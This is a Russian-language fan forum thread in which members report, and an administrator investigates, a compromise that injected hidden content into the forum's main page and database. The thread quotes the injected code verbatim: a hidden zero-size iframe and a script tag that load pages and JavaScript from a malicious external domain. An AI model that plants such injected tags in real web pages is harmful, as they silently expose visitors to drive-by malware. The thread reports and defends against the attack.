Главная страница форуме содержит ссылку на фишинг-сайт
Главная страница форуме содержит ссылку на фишинг-сайт
Господа, информирую Вас о том, что главная страница содержит ссылки на сайт "http://google-analistyc.net/in.cgi?8", опознаваемый Касперским как использующийся для фишинга. Учитывая, что ранее ничего такого на форуме не было, подозреваю, что сие есть результат атаки или некой неизвестной махинации. Просьба администрации и модераторам разобраться, что к чему, ибо это совсем не дело. А если попадётся кто?
Строчек со ссылкой там несколько, и они имеют вид
<iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe>
То есть открываются в iframe'е со всеми вытекающими (видимо, происходит автоматическое перенаправление; я, конечно, все такие фокусы блокировал)
Строчек со ссылкой там несколько, и они имеют вид
<iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe>
То есть открываются в iframe'е со всеми вытекающими (видимо, происходит автоматическое перенаправление; я, конечно, все такие фокусы блокировал)
Пожирателям посвящается:
Волшебник, славянин или еврей -
Повсюду одинакова картина:
Гордыня чистокровностью своей -
Святое утешение кретина.
(почти по И. Губерману)
Волшебник, славянин или еврей -
Повсюду одинакова картина:
Гордыня чистокровностью своей -
Святое утешение кретина.
(почти по И. Губерману)
Re:
Я это заметил только минут за десять до создания темы, хотя захожу достаточно часто. Днём предупреждений не было. Пока разбирался, где именно ссылка (у меня было одновременно открыто несколько вкладок), пока копался в коде - время прошло. Возможно, ссылка была и раньше, просто очередной апдейт Касперского начал распознавать её как ссылку на фишинговый сайт.Actani писал(а):Кстати, вчера-позавчера такого не было?
Пожирателям посвящается:
Волшебник, славянин или еврей -
Повсюду одинакова картина:
Гордыня чистокровностью своей -
Святое утешение кретина.
(почти по И. Губерману)
Волшебник, славянин или еврей -
Повсюду одинакова картина:
Гордыня чистокровностью своей -
Святое утешение кретина.
(почти по И. Губерману)
- mifiozi
- Вечно сонный и ленивый •̪̀●́
- Сообщения: 1292
- Зарегистрирован: 01 апр 2013 13:13
- Псевдоним: Тупой ботаник
- Пол: скорее мужской, чем женский
- Откуда: Москва
- Контактная информация:
Ситуэйшн мне весьма не ясный
Ычера ссылки действительно были, более того, ссылки были около названий категорий форума и виделись они в админке как "битые" и правке не подлежали, сейчас их там нет, все работает исправно, однако я совершенно случайно обнаруживаю, что у нас изменился пароль на MySQL.
В общем, ясно, что ничего не ясно, буду копаться.
Ычера ссылки действительно были, более того, ссылки были около названий категорий форума и виделись они в админке как "битые" и правке не подлежали, сейчас их там нет, все работает исправно, однако я совершенно случайно обнаруживаю, что у нас изменился пароль на MySQL.
В общем, ясно, что ничего не ясно, буду копаться.
Делай как я! Даёшь максимальную информативность форума!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
- mifiozi
- Вечно сонный и ленивый •̪̀●́
- Сообщения: 1292
- Зарегистрирован: 01 апр 2013 13:13
- Псевдоним: Тупой ботаник
- Пол: скорее мужской, чем женский
- Откуда: Москва
- Контактная информация:
Все, вот и найден корень зла
Наш сервер(не конкретно нас, ибо кому мы нужны?) ночью пытались взломать, утром заметили, поправили что нашли и сменили пароли.
Сейчас все должно быт нормально, еще вечерком поищу бекдоры на всякий случай.
Наш сервер(не конкретно нас, ибо кому мы нужны?) ночью пытались взломать, утром заметили, поправили что нашли и сменили пароли.
Сейчас все должно быт нормально, еще вечерком поищу бекдоры на всякий случай.
Делай как я! Даёшь максимальную информативность форума!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
- Fleur Delacour
- Заслуженный Волшебник
- Сообщения: 4938
- Зарегистрирован: 07 окт 2008 11:23
- Псевдоним: равский романтик (с) А.
- Пол: скорее женский, чем мужской
- Контактная информация:
- Gregory Gontha
- Заслуженный Волшебник
- Сообщения: 2499
- Зарегистрирован: 29 апр 2008 23:09
- Пол: мужской
- mifiozi
- Вечно сонный и ленивый •̪̀●́
- Сообщения: 1292
- Зарегистрирован: 01 апр 2013 13:13
- Псевдоним: Тупой ботаник
- Пол: скорее мужской, чем женский
- Откуда: Москва
- Контактная информация:
Хм, нет, действительно... они снова появились
Короче, буду думать)
Короче, буду думать)
Делай как я! Даёшь максимальную информативность форума!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
- Альтаир Бергадлер
- Любвеобильный феникс
- Сообщения: 1738
- Зарегистрирован: 09 янв 2008 14:52
- Псевдоним: Отец русской демократии
- Пол: скорее мужской, чем женский
- Откуда: Багряный революционный рассвет
- Контактная информация:
- mifiozi
- Вечно сонный и ленивый •̪̀●́
- Сообщения: 1292
- Зарегистрирован: 01 апр 2013 13:13
- Псевдоним: Тупой ботаник
- Пол: скорее мужской, чем женский
- Откуда: Москва
- Контактная информация:
Альтаир Бергадлер, периодически просто чищу в базе руками, казец на лицо, в базе произвольно сами меняются названия форумов, дописываются эти гребанные строчки.
На данный момент хочу предупредить всех - там стоит не ссылка, а фрейм, а значит хотим мы или нет, но страница прописанная та у нас на фоне открывается. Таким образом, в зависимости от того что именно злоумышленник хочет, вы уже могли попасться на атаку. Особенно это касается пользователей с ИЕ6 или любым другим старым браузером(новые версии не от веселого энтузиазма пишутся!).
Те, у кого есть возможность, желательно сидеть с браузеров свежих версий, с повышенной безопасностью и т.д.
В любом случае, пока есть угроза хоть какая-то я тему закрывать не буду, желательно поглядывать сюда кому интересно и установить и запустить антивирус. Если чего-нить найдется - сообщить сюда, возьмем вирусок и препарируем как лягушку
На данный момент хочу предупредить всех - там стоит не ссылка, а фрейм, а значит хотим мы или нет, но страница прописанная та у нас на фоне открывается. Таким образом, в зависимости от того что именно злоумышленник хочет, вы уже могли попасться на атаку. Особенно это касается пользователей с ИЕ6 или любым другим старым браузером(новые версии не от веселого энтузиазма пишутся!).
Те, у кого есть возможность, желательно сидеть с браузеров свежих версий, с повышенной безопасностью и т.д.
В любом случае, пока есть угроза хоть какая-то я тему закрывать не буду, желательно поглядывать сюда кому интересно и установить и запустить антивирус. Если чего-нить найдется - сообщить сюда, возьмем вирусок и препарируем как лягушку
Делай как я! Даёшь максимальную информативность форума!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
Re:
Хм, а нельзя просто скрипт добавить, который бы сам из базы удалял периодически нужную запись? Или ещё лучше INSERT-тригер, не знаю правда есть ли они в MySQL...mifiozi писал(а):Альтаир Бергадлер, периодически просто чищу в базе руками
P.S. Проверил: триггеры появились в MySQL 5.0. Так что вполне можно написать триггер, который будет при попытке вставить запись в нужные таблицы проверять, есть ли в этой записи iframe и если есть - запрещать вставку (ну или модификацию, конечно, если там update).
Пожирателям посвящается:
Волшебник, славянин или еврей -
Повсюду одинакова картина:
Гордыня чистокровностью своей -
Святое утешение кретина.
(почти по И. Губерману)
Волшебник, славянин или еврей -
Повсюду одинакова картина:
Гордыня чистокровностью своей -
Святое утешение кретина.
(почти по И. Губерману)
- Lady Astrel
- Заслуженный Волшебник
- Сообщения: 11577
- Зарегистрирован: 05 авг 2004 13:00
- Псевдоним: wicked witch
- Пол: женский
- Откуда: Москва
- Контактная информация:
- mifiozi
- Вечно сонный и ленивый •̪̀●́
- Сообщения: 1292
- Зарегистрирован: 01 апр 2013 13:13
- Псевдоним: Тупой ботаник
- Пол: скорее мужской, чем женский
- Откуда: Москва
- Контактная информация:
Нет нельзя, подумай сам еще раз по поводу этой своей затеи и пойми почему.pokibor писал(а):Хм, а нельзя просто скрипт добавить
Lady Astrel, вижу, значит сегодня буду думать снова
Делай как я! Даёшь максимальную информативность форума!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
- Альтаир Бергадлер
- Любвеобильный феникс
- Сообщения: 1738
- Зарегистрирован: 09 янв 2008 14:52
- Псевдоним: Отец русской демократии
- Пол: скорее мужской, чем женский
- Откуда: Багряный революционный рассвет
- Контактная информация:
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Все наверное уже видели но тем не мение мне кажется что это забавно:
Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
По всей видимости, за последние 90 дней сайт google-analistyc.net действовал в качестве промежуточного звена в заражении других сайтов (135), включая cardcaptorsnet.org/, viharalt.dk/, munashii.org/.
из этих 135, 1-наш
Мда все это канешна несмешно...
ЗЫ: и что вы думаете, захожу я на сайт домена и вот те на картина Репина
мда...прям нерест вирусов...Вредоносное ПО включает 193 exploit(s), 148 scripting exploit(s), 33 trojan(s). Успешное заражение в привело к запуску новых процессов (в среднем 0) на целевой машине.
Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая bestpicturemedia.cn/.
Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
По всей видимости, за последние 90 дней сайт google-analistyc.net действовал в качестве промежуточного звена в заражении других сайтов (135), включая cardcaptorsnet.org/, viharalt.dk/, munashii.org/.
из этих 135, 1-наш
Мда все это канешна несмешно...
ЗЫ: и что вы думаете, захожу я на сайт домена и вот те на картина Репина
Вредоносное ПО включает 32319 exploit(s), 43 trojan(s), 11 scripting exploit(s). Успешное заражение в привело к запуску новых процессов (в среднем 0) на целевой машине.
This site was hosted on 1 network(s) including AS29073 (ECATEL).
Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
По всей видимости, за последние 90 дней сайт bestpicturemedia.cn действовал в качестве промежуточного звена в заражении других сайтов (1129), включая basega.com/, tastytara.com/, zaceni.net.ru/.
- mifiozi
- Вечно сонный и ленивый •̪̀●́
- Сообщения: 1292
- Зарегистрирован: 01 апр 2013 13:13
- Псевдоним: Тупой ботаник
- Пол: скорее мужской, чем женский
- Откуда: Москва
- Контактная информация:
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Провожу еще один опыт - если в течение этого дня и вечера ничего не появится, то причина окажется весьма офигительной и я пойду убиваться об стену
Делай как я! Даёшь максимальную информативность форума!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
- Lady Astrel
- Заслуженный Волшебник
- Сообщения: 11577
- Зарегистрирован: 05 авг 2004 13:00
- Псевдоним: wicked witch
- Пол: женский
- Откуда: Москва
- Контактная информация:
Re: Главная страница форуме содержит ссылку на фишинг-сайт
mifiozi, всё на месте...
A triffle, a little, the likeness of a dream, and death comes as the end...
Лучший форумец 2007 г.
Лучший форумец 2007 г.
- mifiozi
- Вечно сонный и ленивый •̪̀●́
- Сообщения: 1292
- Зарегистрирован: 01 апр 2013 13:13
- Псевдоним: Тупой ботаник
- Пол: скорее мужской, чем женский
- Откуда: Москва
- Контактная информация:
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Все, я сдаюсь =(
В понедельник напишу администратору сервера
В понедельник напишу администратору сервера
Делай как я! Даёшь максимальную информативность форума!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
Личный раздел => Личные настройки => Настройки отображения => Вырубить смайлы, аватары и подписи!!!
- Альтаир Бергадлер
- Любвеобильный феникс
- Сообщения: 1738
- Зарегистрирован: 09 янв 2008 14:52
- Псевдоним: Отец русской демократии
- Пол: скорее мужской, чем женский
- Откуда: Багряный революционный рассвет
- Контактная информация:
Re: Главная страница форуме содержит ссылку на фишинг-сайт
mifiozi, пробовал убивать весь тег <title>?
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Эта фигня на страничкеболее активная кажется стала
Самые сильные изо всех воинов - Время и Терпение. (с) Лев Толстой
Если миллионы людей повторяют глупость, она не перестаёт от этого быть глупостью. (с) Анатоль Франс
Если миллионы людей повторяют глупость, она не перестаёт от этого быть глупостью. (с) Анатоль Франс
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Господа, "с радостью" сообщаю, что ссылочка на фишинговый сайт вернулась. Теперь она имеет вид
<script src="http://google-analistyc.net/urchin.js" type="text/javascript"></script>
и, как видно, ведёт на некий java-script код.
<script src="http://google-analistyc.net/urchin.js" type="text/javascript"></script>
и, как видно, ведёт на некий java-script код.
Пожирателям посвящается:
Волшебник, славянин или еврей -
Повсюду одинакова картина:
Гордыня чистокровностью своей -
Святое утешение кретина.
(почти по И. Губерману)
Волшебник, славянин или еврей -
Повсюду одинакова картина:
Гордыня чистокровностью своей -
Святое утешение кретина.
(почти по И. Губерману)
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Там несколько ссылок мелькает, не только гугловский ресурс. Меня в конце концов на какуюто страничку "sexidre..." выкинуло. Но там ошибка 404. Приходится вовремя "Остановить" в браузере жать.
Самые сильные изо всех воинов - Время и Терпение. (с) Лев Толстой
Если миллионы людей повторяют глупость, она не перестаёт от этого быть глупостью. (с) Анатоль Франс
Если миллионы людей повторяют глупость, она не перестаёт от этого быть глупостью. (с) Анатоль Франс
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Говорят, что сегодня починят.
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Проверил комп и очистил антивирусом ESET NOD 3.0.650 базы v.3732 (20090102). Далее сходил на главную страну форума (перекинуло на страницу с ошибкой 404) и на гл. страницу чата ( загрузилась нормально, но после зависла и начала жрать трафик. Сожрала пол метра и я её отрубил). Далее снова всё проверил НОДом, никаких вирусов не нашёл.
Эт я на тот случай, что может кто нибудь боится ходить на форум. Но 100% гарантиии всё равно же нету.
Эт я на тот случай, что может кто нибудь боится ходить на форум. Но 100% гарантиии всё равно же нету.
Самые сильные изо всех воинов - Время и Терпение. (с) Лев Толстой
Если миллионы людей повторяют глупость, она не перестаёт от этого быть глупостью. (с) Анатоль Франс
Если миллионы людей повторяют глупость, она не перестаёт от этого быть глупостью. (с) Анатоль Франс
- Альтаир Бергадлер
- Любвеобильный феникс
- Сообщения: 1738
- Зарегистрирован: 09 янв 2008 14:52
- Псевдоним: Отец русской демократии
- Пол: скорее мужской, чем женский
- Откуда: Багряный революционный рассвет
- Контактная информация:
Re: Главная страница форуме содержит ссылку на фишинг-сайт
mifiozi , мда...как говорицца в се гениальное просто (С) вот и у нас, оказалось что достаточно изменить тэг и скрипт сломлецца, кароче от всей души поздравляю с победой.
ПС. На всякий случай проверил себя на вшивость нодом в. 3733, вроде подозрительных объектов не было.
ПС. На всякий случай проверил себя на вшивость нодом в. 3733, вроде подозрительных объектов не было.
Re: Главная страница форуме содержит ссылку на фишинг-сайт
Всё внорме.
в.3733 гут=)
в.3733 гут=)
Самые сильные изо всех воинов - Время и Терпение. (с) Лев Толстой
Если миллионы людей повторяют глупость, она не перестаёт от этого быть глупостью. (с) Анатоль Франс
Если миллионы людей повторяют глупость, она не перестаёт от этого быть глупостью. (с) Анатоль Франс